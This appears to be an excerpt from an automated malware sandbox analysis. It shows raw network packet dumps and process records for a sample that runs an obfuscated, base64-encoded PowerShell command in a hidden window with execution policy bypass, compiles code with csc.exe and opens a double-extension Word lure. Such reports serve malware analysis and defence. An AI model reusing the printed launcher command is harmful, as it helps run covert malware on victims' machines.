JOB<OvO:N+gOJOBOvO:NgOJOB6OvO:NegOJ4@OOBOvO:NgOJ$@OOBvOvO:NgOJ@OOBnOvO:NgOJ@OOBFOvO:NgOJ@OOBFOvO:N%gOJ<@OO
2024-12-11 12:00:13 UTC	1369	IN	Data Raw: 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 25 84 67 4f 07 c2 4a c4 41 e9 4f 07 c4 4f 07 c2 42 36 cd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 05 84 67 4f 07 c2 4a 3c 41 e9 4f 07 c4 4f 07 c2 42 3e cd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 65 84 67 4f 07 c2 4a 34 41 e9 4f 07 c4 4f 07 c2 42 3e cd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 45 84 67 4f 07 c2 4a 2c 41 e9 4f 07 c4 4f 07 c2 42 2e cd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 a5 85 67 4f 07 c2 4a 2c 41 e9 4f 07 c4 4f 07 c2 42 0e cc 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 85 85 67 4f 07 c2 4a 04 41 e9 4f 07 c4 4f 07 c2 42 66 cc 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 e5 85 67 4f 07 c2 4a 7c 41 e9 4f 07 c4 4f 07 c2 42 5e cc 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 c5 85 67 4f 07 c2 4a 54 41 e9 4f 07 c4 4f 07 c2 42 b6 cd Data Ascii: OvO:N%gOJAOOB6OvO:NgOJ<AOOB>OvO:NegOJ4AOOB>OvO:NEgOJ,AOOB.OvO:NgOJ,AOOBOvO:NgOJAOOBfOvO:NgOJ\|AOOB^OvO:NgOJTAOOB
2024-12-11 12:00:13 UTC	1369	IN	Data Raw: 4f 07 c2 42 8e cf 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 45 89 67 4f 07 c2 4a 94 44 e9 4f 07 c4 4f 07 c2 42 e6 cf 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 a5 8a 67 4f 07 c2 4a 84 44 e9 4f 07 c4 4f 07 c2 42 de cf 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 85 8a 67 4f 07 c2 4a fc 44 e9 4f 07 c4 4f 07 c2 42 36 cf 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 e5 8a 67 4f 07 c2 4a d4 44 e9 4f 07 c4 4f 07 c2 42 2e cf 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 c5 8a 67 4f 07 c2 4a cc 44 e9 4f 07 c4 4f 07 c2 42 06 cf 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 25 8a 67 4f 07 c2 4a 24 44 e9 4f 07 c4 4f 07 c2 42 7e cf 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 05 8a 67 4f 07 c2 4a 2c 44 e9 4f 07 c4 4f 07 c2 42 7e cf 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 65 8a 67 4f 07 c2 4a 04 44 e9 4f 07 Data Ascii: OBOvO:NEgOJDOOBOvO:NgOJDOOBOvO:NgOJDOOB6OvO:NgOJDOOB.OvO:NgOJDOOBOvO:N%gOJ$DOOB~OvO:NgOJ,DOOB~OvO:NegOJDO
2024-12-11 12:00:13 UTC	1369	IN	Data Raw: 4a 74 46 e9 4f 07 c4 4f 07 c2 42 8e 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 e5 8f 67 4f 07 c2 4a 64 46 e9 4f 07 c4 4f 07 c2 42 e6 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 c5 8f 67 4f 07 c2 4a 6c 46 e9 4f 07 c4 4f 07 c2 42 fe 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 25 8f 67 4f 07 c2 4a 44 46 e9 4f 07 c4 4f 07 c2 42 f6 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 05 8f 67 4f 07 c2 4a bc 47 e9 4f 07 c4 4f 07 c2 42 fe 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 65 8f 67 4f 07 c2 4a 94 47 e9 4f 07 c4 4f 07 c2 42 d6 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 45 8f 67 4f 07 c2 4a 8c 47 e9 4f 07 c4 4f 07 c2 42 de 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 a5 f0 67 4f 07 c2 4a fc 47 e9 4f 07 c4 4f 07 c2 42 36 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 85 f0 67 4f 07 Data Ascii: JtFOOB1OvO:NgOJdFOOB1OvO:NgOJlFOOB1OvO:N%gOJDFOOB1OvO:NgOJGOOB1OvO:NegOJGOOB1OvO:NEgOJGOOB1OvO:NgOJGOOB61OvO:NgO
2024-12-11 12:00:13 UTC	1369	IN	Data Raw: a6 25 f4 67 4f 07 c2 4a 7c 49 e9 4f 07 c4 4f 07 c2 42 8e 33 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 05 f4 67 4f 07 c2 4a 6c 49 e9 4f 07 c4 4f 07 c2 42 9e 33 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 65 f4 67 4f 07 c2 4a 6c 49 e9 4f 07 c4 4f 07 c2 42 8e 33 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 45 f4 67 4f 07 c2 4a 5c 49 e9 4f 07 c4 4f 07 c2 42 e6 33 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 a5 f5 67 4f 07 c2 4a 4c 49 e9 4f 07 c4 4f 07 c2 42 de 33 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 85 f5 67 4f 07 c2 4a 4c 49 e9 4f 07 c4 4f 07 c2 42 c6 33 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 e5 f5 67 4f 07 c2 4a a4 4a e9 4f 07 c4 4f 07 c2 42 3e 33 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 c5 f5 67 4f 07 c2 4a 9c 4a e9 4f 07 c4 4f 07 c2 42 16 33 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 Data Ascii: %gOJ\|IOOB3OvO:NgOJlIOOB3OvO:NegOJlIOOB3OvO:NEgOJ\IOOB3OvO:NgOJLIOOB3OvO:NgOJLIOOB3OvO:NgOJJOOB>3OvO:NgOJJOOB3OvO:N
2024-12-11 12:00:13 UTC	1369	IN	Data Raw: 4f 3a 4e 8c 07 c4 9f a6 45 f9 67 4f 07 c2 4a 6c 4a e9 4f 07 c4 4f 07 c2 42 ce 36 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 a5 fa 67 4f 07 c2 4a 6c 4a e9 4f 07 c4 4f 07 c2 42 26 36 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 85 fa 67 4f 07 c2 4a 5c 4a e9 4f 07 c4 4f 07 c2 42 1e 36 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 e5 fa 67 4f 07 c2 4a 4c 4a e9 4f 07 c4 4f 07 c2 42 76 36 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 c5 fa 67 4f 07 c2 4a a4 4b e9 4f 07 c4 4f 07 c2 42 6e 36 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 25 fa 67 4f 07 c2 4a 9c 4b e9 4f 07 c4 4f 07 c2 42 46 36 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 05 fa 67 4f 07 c2 4a f4 4b e9 4f 07 c4 4f 07 c2 42 be 37 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 65 fa 67 4f 07 c2 4a ec 4b e9 4f 07 c4 4f 07 c2 42 96 37 17 4f 07 cc Data Ascii: O:NEgOJlJOOB6OvO:NgOJlJOOB&6OvO:NgOJ\JOOB6OvO:NgOJLJOOBv6OvO:NgOJKOOBn6OvO:N%gOJKOOBF6OvO:NgOJKOOB7OvO:NegOJKOOB7O

Target ID:	1
Start time:	06:58:25
Start date:	11/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /v /k "powERSheLl.EXE -WInDOwStYle HiDdEN -encOdeDcOmmAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBWAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEUAOABBAFoAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEgASQBBAFMAUQBCAE8AQQBFAGMAQQBLAEEAQQBvAEEARQBrAEEAVgB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAGgAQQBGAG8AQQBRAFEAQQA5AEEARAAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARQA0AEEAZABBAEIARgBBAEUANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="" && exit
Imagebase:	0x7ff6d51c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	06:58:28
Start date:	11/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oho2nqxk\oho2nqxk.cmdline"
Imagebase:	0x7ff704630000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	8
Start time:	06:58:35
Start date:	11/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Imagebase:	0x7ff748330000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	10
Start time:	06:58:38
Start date:	11/12/2024
Path:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\Meeting-Registration-Form.docx.docx" /o ""
Imagebase:	0x7ff663ed0000
File size:	1'635'104 bytes
MD5 hash:	E7F3B8EA1B06F46176FC5C35307727D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false